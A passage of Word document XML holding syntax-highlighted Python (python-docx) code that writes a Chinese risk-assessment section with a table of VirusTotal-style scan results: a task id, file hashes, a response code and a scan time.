          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一级标题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>风险评估</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_page_break</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_heading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>风险评估</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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table = document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Colorful Shading Accent 1'</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first_line_cells = table.rows[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>].cells</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    first_line_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_line_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>record_dict = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321-1649578554"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"sha1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>摘要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"08af85f31499678205bf70280fafc421ea16c9e2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>样本哈希（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"C31852836ACBBEC2101824999B482DE3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应码（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>response_code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"2022-04-10 08:15:54"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"VT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
